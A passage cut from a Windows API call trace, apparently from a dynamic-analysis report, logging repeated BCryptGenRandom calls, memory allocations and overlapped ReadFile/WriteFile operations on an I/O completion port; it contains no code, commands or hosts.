pbBuffer=0x30efc30) returned 0x0 [0206.074] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.075] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0206.075] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0206.075] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0206.075] free (_Block=0x3e305b8) [0206.075] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0206.075] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0206.075] free (_Block=0x1fa91d0) [0206.075] free (_Block=0x1fa2ed8) [0206.075] free (_Block=0x1fa90b8) [0206.075] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0206.076] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0206.080] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x17d, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0206.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0206.080] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0206.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.337] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2d7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0209.337] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.337] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.338] CloseHandle (hObject=0x338) returned 1 [0209.338] free (_Block=0x1ff1e60) [0209.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.356] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.357] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0209.357] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.357] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0209.357] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.357] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.357] free (_Block=0x3e305b8) [0209.357] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.357] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.358] free (_Block=0x1fa91d0) [0209.358] free (_Block=0x1fa2ed8) [0209.358] free (_Block=0x1fa90b8) [0209.358] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0209.358] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.359] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0209.359] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.369] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1a7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.369] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.369] CloseHandle (hObject=0x170) returned 1 [0209.369] free (_Block=0x3df0008) [0209.369] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.375] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.376] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0209.376] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.376] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0209.376] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.376] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.376] free (_Block=0x3e305b8) [0209.376] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.376] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.377] free (_Block=0x1fa91d0) [0209.377] free (_Block=0x1fa2ed8) [0209.377] free (_Block=0x1fa90b8) [0209.377] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.377] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.388] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x115, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.388] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.389] CloseHandle (hObject=0x170) returned 1 [0209.389] free (_Block=0x3df0008) [0209.389] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.399] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0209.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.399] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0209.400] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.400] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.400] free (_Block=0x3e305b8) [0209.400] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.400] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.400] free (_Block=0x1fa91d0) [0209.400] free (_Block=0x1fa2ed8) [0209.400] free (_Block=0x1fa90b8) [0209.400] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.401] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.401] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.441] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x482, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.441] CloseHandle (hObject=0x170) returned 1 [0209.441] free (_Block=0x3df0008) [0209.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.489] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.489] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0209.489] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.489] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0209.490] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.490] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.490] free (_Block=0x3e305b8) [0209.490] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.490] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.490] free (_Block=0x1fa91d0) [0209.490] free (_Block=0x1fa2ed8) [0209.490] free (_Block=0x1fa90b8) [0209.490] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0209.490] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.511] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0209.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.511] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0209.512] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.512] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.512] free (_Block=0x3e305b8) [0209.512] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.512] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.512] free (_Block=0x1fa91d0) [0209.512] free (_Block=0x1fa2ed8) [0209.512] free (_Block=0x1fa90b8) [0209.512] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0209.512] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.515] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1ba, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0209.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.712] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0209.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0209.715] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.715] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.715] free (_Block=0x3e305b8) [0209.715] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.715] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.715] free (_Block=0x1fa91d0) [0209.715] free (_Block=0x1fa2ed8) [0209.715] free (_Block=0x1fa90b8) [0209.715] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0209.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.730] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0209.730] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.731] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0209.731] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.731] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.731] free (_Block=0x3e305b8) [0209.731] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.731] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.731] free (_Block=0x1fa91d0) [0209.731] free (_Block=0x1fa2ed8) [0209.731] free (_Block=0x1fa90b8) [0209.732] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0209.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.742] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.742] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0209.742] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.742] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0209.743] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.743] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.743] free (_Block=0x3e305b8) [0209.743] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.743] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.743] free (_Block=0x1fa91d0) [0209.743] free (_Block=0x1fa2ed8) [0209.743] free (_Block=0x1fa90b8) [0209.743] WriteFile (in: hFile=0x3cc, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0209.743] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.753] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.753] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.753] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0209.753] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.753] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.753] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0209.756] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.756] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.756] free (_Block=0x3e305b8) [0209.756] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.756] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.756] free (_Block=0x1fa91d0) [0209.756] free (_Block=0x1fa2ed8) [0209.756] free (_Block=0x1fa90b8) [0209.756] WriteFile (in: hFile=0x238, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0209.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0209.762] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.763] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0209.763] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.763] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0209.763] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.763] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.763] free (_Block=0x3e305b8) [0209.763] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.763] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.764] free (_Block=0x1fa91d0) [0209.764] free (_Block=0x1fa2ed8) [0209.764] free (_Block=0x1fa90b8) [0209.764] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.764] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0210.052] WriteFile (in: hFile=0x238, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1fa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.053] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0210.080] CloseHandle (hObject=0xec) returned 1 [0210.080] free (_Block=0x1ff1e60) [0210.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0210.107] CloseHandle (hObject=0x170) returned 1 [0210.107] free (_Block=0x3d70450) [0210.107] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0210.115] CloseHandle (hObject=0x3cc) returned 1 [0210.116] free (_Block=0x3e70008) [0210.116] GetQueuedCompletionStatus (in: 